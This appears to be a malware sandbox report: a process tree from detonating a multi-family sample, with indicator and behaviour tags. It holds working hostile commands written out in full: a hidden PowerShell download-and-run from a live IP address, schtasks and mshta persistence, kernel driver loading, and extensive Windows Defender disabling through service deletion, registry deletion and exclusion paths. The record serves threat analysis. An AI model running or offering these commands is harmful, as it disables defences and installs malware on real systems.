outlook_win_path 1 IoCs

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676	RegAsm.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3412
- C:\Users\Admin\AppData\Local\Temp\2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
  "C:\Users\Admin\AppData\Local\Temp\2025-03-31_15b187760f4551f2a6827099467de67e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  - Suspicious use of WriteProcessMemory
  PID:452
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c schtasks /create /tn XE7Lrmapuzt /tr "mshta C:\Users\Admin\AppData\Local\Temp\iwhDZFRg6.hta" /sc minute /mo 25 /ru "Admin" /f
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:468
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /tn XE7Lrmapuzt /tr "mshta C:\Users\Admin\AppData\Local\Temp\iwhDZFRg6.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:4172
- - C:\Windows\SysWOW64\mshta.exe
    mshta C:\Users\Admin\AppData\Local\Temp\iwhDZFRg6.hta
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:4164
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'M0VBHEAGQWTZLSKTQAIWO2UDWNLLKVTH.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Downloads MZ/PE file
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:5956
    - - C:\Users\Admin\AppData\Local\TempM0VBHEAGQWTZLSKTQAIWO2UDWNLLKVTH.EXE
        
        "C:\Users\Admin\AppData\Local\TempM0VBHEAGQWTZLSKTQAIWO2UDWNLLKVTH.EXE"
        5⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:5000
      - C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
        
        "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Downloads MZ/PE file
        Checks BIOS information in registry
        Checks computer location settings
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:1168
        
        C:\Users\Admin\AppData\Local\Temp\10362200101\73a0821db9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10362200101\73a0821db9.exe"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Writes to the Master Boot Record (MBR)
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2356
        
        C:\Users\Admin\AppData\Local\Temp\10374380101\feb9141ed1.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10374380101\feb9141ed1.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5980
        
        C:\Users\Admin\AppData\Local\Temp\221.exe
        
        "C:\Users\Admin\AppData\Local\Temp\221.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2056
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BCA9.tmp\BCAA.tmp\BCAB.bat C:\Users\Admin\AppData\Local\Temp\221.exe"
        9⤵
        Suspicious use of WriteProcessMemory
        
        PID:5808
        
        C:\Users\Admin\AppData\Local\Temp\221.exe
        
        "C:\Users\Admin\AppData\Local\Temp\221.exe" go
        10⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:5412
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BDA3.tmp\BDA4.tmp\BDA5.bat C:\Users\Admin\AppData\Local\Temp\221.exe go"
        11⤵
        Drops file in Program Files directory
        Suspicious use of WriteProcessMemory
        
        PID:5080
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        12⤵
        Launches sc.exe
        
        PID:3284
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        12⤵
        Launches sc.exe
        
        PID:2796
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        12⤵
        Delays execution with timeout.exe
        
        PID:5088
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        12⤵
        Launches sc.exe
        
        PID:1560
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        12⤵
        Launches sc.exe
        
        PID:5292
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        12⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4980
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        12⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4396
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        12⤵
        Launches sc.exe
        
        PID:5916
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        12⤵
        Launches sc.exe
        
        PID:4380
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        12⤵
        
        PID:4384
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        12⤵
        Launches sc.exe
        
        PID:3464
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        12⤵
        Launches sc.exe
        
        PID:5524
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        12⤵
        
        PID:512
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        12⤵
        Launches sc.exe
        
        PID:4448
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        12⤵
        Launches sc.exe
        
        PID:4492
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        12⤵
        
        PID:5516
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        12⤵
        Launches sc.exe
        
        PID:4452
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        12⤵
        Launches sc.exe
        
        PID:3448
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        12⤵
        
        PID:2252
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        12⤵
        
        PID:4336
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        12⤵
        Launches sc.exe
        
        PID:4340
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        12⤵
        Modifies security service
        
        PID:4404
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        12⤵
        Launches sc.exe
        
        PID:1896
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        12⤵
        Launches sc.exe
        
        PID:2892
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        12⤵
        
        PID:4520
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        12⤵
        
        PID:5144
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        12⤵
        Launches sc.exe
        
        PID:348
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        12⤵
        
        PID:224
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        12⤵
        Launches sc.exe
        
        PID:2028
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        12⤵
        Launches sc.exe
        
        PID:2260
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        12⤵
        
        PID:2916
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        12⤵
        Launches sc.exe
        
        PID:2684
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        12⤵
        Launches sc.exe
        
        PID:1836
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        12⤵
        
        PID:1356
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        12⤵
        Launches sc.exe
        
        PID:2004
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        12⤵
        Launches sc.exe
        
        PID:4200
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        12⤵
        
        PID:2972
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        12⤵
        Launches sc.exe
        
        PID:8
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        12⤵
        Launches sc.exe
        
        PID:1820
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        12⤵
        
        PID:2044
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        12⤵
        Launches sc.exe
        
        PID:936
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        12⤵
        Launches sc.exe
        
        PID:2896
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        12⤵
        
        PID:1924
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        12⤵
        Launches sc.exe
        
        PID:1316
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        12⤵
        Launches sc.exe
        
        PID:2040
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        12⤵
        
        PID:4688
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        12⤵
        Launches sc.exe
        
        PID:4764
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        12⤵
        Launches sc.exe
        
        PID:4704
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        12⤵
        
        PID:1656
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        12⤵
        Launches sc.exe
        
        PID:3752
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        12⤵
        Launches sc.exe
        
        PID:5284
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        12⤵
        
        PID:2824
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        12⤵
        Launches sc.exe
        
        PID:1580
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        12⤵
        Launches sc.exe
        
        PID:5212
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        12⤵
        
        PID:5604
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        12⤵
        
        PID:5968
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        12⤵
        
        PID:5616
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        12⤵
        
        PID:3796
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        12⤵
        
        PID:4904
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        12⤵
        
        PID:4996
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        12⤵
        Launches sc.exe
        
        PID:5148
        
        C:\Users\Admin\AppData\Local\Temp\10380550101\555d5afd67.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10380550101\555d5afd67.exe"
        7⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4728
        
        C:\Users\Admin\AppData\Local\Temp\10382540101\SPOKz5U.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10382540101\SPOKz5U.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2164
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:464
        
        C:\Users\Admin\AppData\Local\Temp\10385170101\nAM5wkr.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10385170101\nAM5wkr.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        
        PID:924
        
        C:\Windows\SYSTEM32\CMD.exe
        
        "CMD" netsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\xdwdkernel.exe" WindowsControl ENABLE & exit
        8⤵
        
        PID:2516
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft Cloud" /tr "C:\Users\Admin\AppData\Roaming\xdwdkernel.exe" /RL HIGHEST & exit
        8⤵
        
        PID:1500
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc minute /mo 1 /tn "Microsoft Cloud" /tr "C:\Users\Admin\AppData\Roaming\xdwdkernel.exe" /RL HIGHEST
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:4280
        
        C:\Windows\SYSTEM32\cmd.exe
        
        "cmd" /c schtasks /create /f /sc minute /mo 30 /tn "Microsoft DotNet Kernel" /tr "C:\Users\Admin\AppData\Roaming\xdwdmicrosoft.exe" /RL HIGHEST & exit
        8⤵
        
        PID:900
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /create /f /sc minute /mo 30 /tn "Microsoft DotNet Kernel" /tr "C:\Users\Admin\AppData\Roaming\xdwdmicrosoft.exe" /RL HIGHEST
        9⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:2608
        
        C:\Users\Admin\AppData\Roaming\xdwdkernel.exe
        
        "C:\Users\Admin\AppData\Roaming\xdwdkernel.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:4168
        
        C:\Users\Admin\AppData\Local\Temp\10386410101\bprz1VA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10386410101\bprz1VA.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5000
        
        C:\Users\Admin\AppData\Local\Temp\wow_6262_build (9).exe
        
        "C:\Users\Admin\AppData\Local\Temp\wow_6262_build (9).exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3968
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5564
        
        C:\Users\Admin\AppData\Local\Temp\Built.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Built.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:5160
        
        C:\Users\Admin\AppData\Local\Temp\Built.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Built.exe"
        9⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        
        PID:5760
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'"
        10⤵
        
        PID:3496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Built.exe'
        11⤵
        Command and Scripting Interpreter: PowerShell
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2320
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        10⤵
        
        PID:5824
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
        11⤵
        Command and Scripting Interpreter: PowerShell
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1356
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        10⤵
        
        PID:3344
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        11⤵
        Loads dropped DLL
        Enumerates processes with tasklist
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2640
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        10⤵
        
        PID:2208
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        11⤵
        Loads dropped DLL
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:964
        
        C:\Users\Admin\AppData\Local\Temp\Luma_Crypt_Packlab.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Luma_Crypt_Packlab.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3444
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2212
        
        C:\Users\Admin\AppData\Local\Temp\10386980101\FOm9tvc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10386980101\FOm9tvc.exe"
        7⤵
        Suspicious use of NtCreateUserProcessOtherParentProcess
        Executes dropped EXE
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3256
        
        C:\Users\Admin\AppData\Local\Temp\10391260101\amnew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10391260101\amnew.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:512
        
        C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
        
        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
        8⤵
        Downloads MZ/PE file
        Checks computer location settings
        Executes dropped EXE
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:2448
        
        C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
        9⤵
        Executes dropped EXE
        
        PID:2220
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        10⤵
        
        PID:4408
        
        C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3968
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:2684
        
        C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3408
        
        C:\Users\Admin\AppData\Local\Temp\is-6GMPN.tmp\Bell_Setup16.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-6GMPN.tmp\Bell_Setup16.tmp" /SL5="$6004E,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
        10⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4276
        
        C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
        11⤵
        Executes dropped EXE
        
        PID:4872
        
        C:\Users\Admin\AppData\Local\Temp\is-89UT5.tmp\Bell_Setup16.tmp
        
        "C:\Users\Admin\AppData\Local\Temp\is-89UT5.tmp\Bell_Setup16.tmp" /SL5="$9023A,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
        12⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        
        PID:5404
        
        C:\Windows\SysWOW64\regsvr32.exe
        
        "regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"
        13⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:3652
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
        14⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:888
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\PowerShell.exe
        
        "PowerShell.exe" -NoProfile -NonInteractive -Command -
        14⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:4164
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/s /i:INSTALL \"%APPDATA%\1wlanapi.ocx\"' }) { exit 0 } else { exit 1 }"
        14⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        
        PID:464
        
        C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"
        9⤵
        Executes dropped EXE
        
        PID:2300
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"
        10⤵
        Command and Scripting Interpreter: PowerShell
        Loads dropped DLL
        
        PID:1288
        
        C:\Users\Admin\AppData\Roaming\BExplorer\bot.exe
        
        C:\Users\Admin\AppData\Roaming\BExplorer\bot.exe
        10⤵
        Executes dropped EXE
        
        PID:6252
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Try { Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\BExplorer\" -Force -ErrorAction Stop } Catch { exit 0 }"
        11⤵
        Command and Scripting Interpreter: PowerShell
        Loads dropped DLL
        
        PID:6444
        
        C:\Users\Admin\AppData\Local\Temp\10045350101\kololololo.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10045350101\kololololo.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4960
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:6656
        
        C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10045380101\legendarik.exe"
        9⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:6340
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        10⤵
        System Location Discovery: System Language Discovery
        
        PID:7108
        
        C:\Users\Admin\AppData\Local\Temp\10046160101\aa8acb4459.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10046160101\aa8acb4459.exe"
        9⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:6960
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10046160101\aa8acb4459.exe"
        10⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2072
        
        C:\Users\Admin\AppData\Local\Temp\10046170101\6e8a51d5f0.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10046170101\6e8a51d5f0.exe"
        9⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        
        PID:5440
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10046170101\6e8a51d5f0.exe"
        10⤵
        Executes dropped EXE
        
        PID:6532
        
        C:\Users\Admin\AppData\Local\Temp\10391640101\gLLOqKC.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10391640101\gLLOqKC.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:5784
        
        C:\Users\Admin\AppData\Local\Temp\RarSFX0\a5.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\a5.exe"
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:2192
        
        C:\Users\Admin\AppData\Local\Temp\10392050101\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10392050101\apple.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3000
        
        C:\Users\Admin\AppData\Local\Temp\221.exe
        
        "C:\Users\Admin\AppData\Local\Temp\221.exe"
        8⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3988
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\7C6E.tmp\7C6F.tmp\7C70.bat C:\Users\Admin\AppData\Local\Temp\221.exe"
        9⤵
        
        PID:1572
        
        C:\Users\Admin\AppData\Local\Temp\221.exe
        
        "C:\Users\Admin\AppData\Local\Temp\221.exe" go
        10⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2992
        
        C:\Windows\system32\cmd.exe
        
